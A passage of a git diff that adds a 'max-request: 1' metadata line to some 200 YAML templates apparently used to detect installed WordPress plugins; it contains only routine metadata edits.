 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
